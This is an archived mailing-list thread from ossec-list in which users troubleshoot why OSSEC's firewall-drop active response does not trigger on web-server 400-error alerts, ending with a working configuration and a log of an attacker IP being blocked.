>>>   local
>>>   31151
>>>   8
>>> 
>>>
>>> My logs show multiple 31151 alerts. For example:
>>> ossec-alerts-23.log:Rule: 31151 (level 10) -> 'Mutiple web server 400
>>> error codes from same source ip.'
>>> ossec-alerts-25.log:Rule: 31151 (level 10) -> 'Mutiple web server 400
>>> error codes from same source ip.'
>>>
>>> As far as I can tell, the active response has  never been triggered.
>>> There's no active-response log in /var/ossec/logs and no logging of
>>> firewall changes.
>>>
>>> What am I missing?
>>

That ws it. Thanks. I had another attack and the rule fired. Here's the
current ossec.conf:



  firewall-drop
  firewall-drop.sh
  srcip
  yes



  no
  firewall-drop
  local
  31151,31152,31153



And this was in the logs

# more active-responses.log
Sat Oct 30 17:01:56 CDT 2010
/var/ossec/active-response/bin/firewall-drop.sh add
 - 210.21.221.156 1288476115.25429 31151


-- 
-- Steve

Re: [ossec-list] Re: Active Response not activating

2010-10-27 Thread Steven Stern 
It shows in the email alert I get from OSSEC.  The snippet below was
grabbed from OSSEC's logs.

On Wed, Oct 27, 2010 at 1:38 PM, Jeremy Lee  wrote:
> Does the source IP even show when that rule is tripped?
>
> On Wed, Oct 27, 2010 at 11:30 AM, Steven Stern
>  wrote:
>>
>> Thanks.  I've changed it and will await the next attack.
>>
>> On Wed, Oct 27, 2010 at 1:15 PM, jplee3  wrote:
>> > Your  section looks OK. There may be issues with the > > response> portion however. Try this:
>> >
>> > 
>> >  no
>> >  firewall-drop
>> >  local
>> >  31151
>> >  8 (I don't think you even need this flag if you
>> > *only* want to trigger on the rule id 31151)
>> > 
>> >
>> >
>> > Let us know if that works. I think it might be the "disabled" flag
>> > that was keeping it back.
>> >
>> >
>> > On Oct 27, 10:44 am, Steven Stern 
>> > wrote:
>> >> In /var/ossec/etc/osse.conf, I have
>> >>
>> >> 
>> >>   firewall-drop
>> >>   firewall-drop.sh
>> >>   srcip
>> >>   yes
>> >> 
>> >>
>> >> 
>> >>   firewall-drop
>> >>   local
>> >>   31151
>> >>   8
>> >> 
>> >>
>> >> My logs show multiple 31151 alerts. For example:
>> >> ossec-alerts-23.log:Rule: 31151 (level 10) -> 'Mutiple web server 400
>> >> error codes from same source ip.'
>> >> ossec-alerts-25.log:Rule: 31151 (level 10) -> 'Mutiple web server 400
>> >> error codes from same source ip.'
>> >>
>> >> As far as I can tell, the active response has  never been triggered.
>> >> There's no active-response log in /var/ossec/logs and no logging of
>> >> firewall changes.
>> >>
>> >> What am I missing?
>> >
>
>

Re: [ossec-list] Re: Active Response not activating

2010-10-27 Thread Steven Stern 
Thanks.  I've changed it and will await the next attack.

On Wed, Oct 27, 2010 at 1:15 PM, jplee3  wrote:
> Your  section looks OK. There may be issues with the  response> portion however. Try this:
>
> 
>  no
>  firewall-drop
>  local
>  31151
>  8 (I don't think you even need this flag if you
> *only* want to trigger on the rule id 31151)
> 
>
>
> Let us know if that works. I think it might be the "disabled" flag
> that was keeping it back.
>
>
> On Oct 27, 10:44 am, Steven Stern 
> wrote:
>> In /var/ossec/etc/osse.conf, I have
>>
>> 
>>   firewall-drop
>>   firewall-drop.sh
>>   srcip
>>   yes
>> 
>>
>> 
>>   firewall-drop
>>   local
>>   31151
>>   8
>> 
>>
>> My logs show multiple 31151 alerts. For example:
>> ossec-alerts-23.log:Rule: 31151 (level 10) -> 'Mutiple web server 400
>> error codes from same source ip.'
>> ossec-alerts-25.log:Rule: 31151 (level 10) -> 'Mutiple web server 400
>> error codes from same source ip.'
>>
>> As far as I can tell, the active response has  never been triggered.
>> There's no active-response log in /var/ossec/logs and no logging of
>> firewall changes.
>>
>> What am I missing?
>

[ossec-list] Active Response not activating

2010-10-27 Thread Steven Stern 
In /var/ossec/etc/osse.conf, I have


  firewall-drop
  firewall-drop.sh
  srcip
  yes



  firewall-drop
  local
  31151
  8


My logs show multiple 31151 alerts. For example:
ossec-alerts-23.log:Rule: 31151 (level 10) -> 'Mutiple web server 400
error codes from same source ip.'
ossec-alerts-25.log:Rule: 31151 (level 10) -> 'Mutiple web server 400
error codes from same source ip.'

As far as I can tell, the active response has  never been triggered.
There's no active-response log in /var/ossec/logs and no logging of
firewall changes.

What am I missing?

[ossec-list] Active Response not activating

2010-10-27 Thread Steven Stern 
OSSEC 2.5.1, Fedora 13

In /var/ossec/etc/osse.conf, I have


 firewall-drop
 firewall-drop.sh
 srcip
 yes



 firewall-drop
 local
 31151
 8


My logs show multiple 31151 alerts. For example:
ossec-alerts-23.log:Rule: 31151 (level 10) -> 'Mutiple web server 400
error codes from same source ip.'
ossec-alerts-25.log:Rule: 31151 (level 10) -> 'Mutiple web server 400
error codes from same source ip.'

As far as I can tell, the active response has  never been triggered.
There's no active-response log in /var/ossec/logs and no logging of
firewall changes.

What am I missing?